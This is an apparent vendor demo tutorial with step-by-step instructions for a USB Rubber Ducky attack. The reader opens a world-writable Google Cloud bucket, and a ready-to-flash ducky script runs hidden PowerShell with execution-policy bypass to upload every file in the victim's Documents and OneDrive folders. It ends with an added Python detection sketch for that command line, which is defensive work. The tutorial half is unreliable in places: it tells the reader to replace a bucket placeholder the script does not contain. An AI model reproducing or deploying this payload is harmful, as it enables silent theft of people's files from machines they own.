1 Log in to your Google Cloud console to create a Google Cloud bucket
- Select Cloud Storage
- Buckets
2 Once in the Buckets section:
- Select Create
- Name your bucket [the name must be unique]
- Accept the default settings
- Select Create
Make sure to uncheck Enforce public access prevention on this bucket, as this bucket needs to be public-facing for the ingress of data to work.
Once the bucket has been created, you will be presented with a screen similar to this one.
For this example, we are going to allow everyone to write (upload files) to the bucket.
Select the Permissions tab.
- Select Grant Access
- Under New principals, type in allUsers
- Assign the role Storage Object Viewer
- Assign the role Storage Object Creator
- Select Save
- Select Allow Public Access
Open a browser and visit Hak5 PayloadStudio
- Select Community Edition
Copy and paste the following code into the Encoder:
REM Data exfiltration to google bucket ThreatLocker
GUI r
DELAY 2000
STRING cmd
ENTER
DELAY 2000
STRING powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { Function UploadFile {Param ([string]$path) Process {$Uri = 'https://www.googleapis.com/upload/storage/v1/b/uploaddemo/o?uploadType=media&name='+$path;Invoke-RestMethod -Method Post -Uri $Uri -Header $header -ContentType 'text/plain' -InFile $path;}}; Get-ChildItem -Path $HOME\Documents,$HOME\OneDrive*\Documents -Recurse | Where-Object { $_.Attributes -ne 'Directory' } | ForEach-Object { try { UploadFile -path $_.FullName }catch{} }; }""
DELAY 2000
ENTER
DELAY 2000
STRING exit
ENTER
Search for the string YOUR_BUCKET_NAME in the ducky script and replace it with your Google bucket's unique name.
Once the change has been made:
- Select Generate Payload
- Select Download
Once downloaded, put your Ducky into storage mode by clicking the button
- Drag and drop your new inject.bin into the ducky's root directory
Congratulations, you are done!
- Eject the Ducky and plug it back into your computer
- The script will run and upload data to your public Google bucket
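
On the endpoint, the payload above shows up as a single PowerShell command line in process-creation logging (for example Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled). The following detection sketch is an added example, not part of the original page or of any ThreatLocker or Hak5 code; the function name `analyze`, the indicator names and the sample command lines are assumptions constructed for illustration.

```python
import re

# Indicators drawn from the payload on this page. PowerShell accepts shortened
# parameter names, so the flag patterns also match forms such as -ep and -w.
INDICATORS = {
    "policy_bypass": re.compile(r"-(?:ex\w*|ep)\s+bypass\b", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden\b", re.I),
    "file_upload": re.compile(
        r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b.*-InFile\b", re.I | re.S),
    "recursive_listing": re.compile(
        r"\b(?:Get-ChildItem|gci)\b.*-Recurse\b", re.I | re.S),
    "gcs_upload_api": re.compile(
        r"googleapis\.com/upload/storage/v1/b/[^/\s'\"]+/o", re.I),
}
BUCKET = re.compile(r"googleapis\.com/upload/storage/v1/b/([^/\s'\"]+)/o", re.I)
SHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def analyze(cmdline):
    """Return matched indicators, the destination bucket and an alert verdict."""
    if not SHELL.search(cmdline):
        return {"hits": [], "bucket": None, "alert": False}
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    match = BUCKET.search(cmdline)
    # Alert only when an upload primitive is combined with at least two of
    # stealth/collection traits; a lone "-ExecutionPolicy Bypass" is common
    # in legitimate admin scripts and would be too noisy on its own.
    upload = "file_upload" in hits or "gcs_upload_api" in hits
    context = {"policy_bypass", "hidden_window", "recursive_listing"} & set(hits)
    return {"hits": hits, "bucket": match.group(1) if match else None,
            "alert": upload and len(context) >= 2}


# Constructed process-creation command lines (not real telemetry);
# "..." marks text elided from the sample.
SAMPLES = [
    r'''powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { ... $Uri = 'https://www.googleapis.com/upload/storage/v1/b/uploaddemo/o?uploadType=media&name='+$path; Invoke-RestMethod -Method Post -Uri $Uri -InFile $path ... Get-ChildItem -Path $HOME\Documents -Recurse ... }"''',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"chrome.exe https://www.googleapis.com/upload/storage/v1/b/team-share/o",
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = analyze(line)
        print(result["alert"], result["bucket"], result["hits"])
```

The extracted bucket name gives responders the exact destination to block at the proxy and to include in an abuse report to the storage provider.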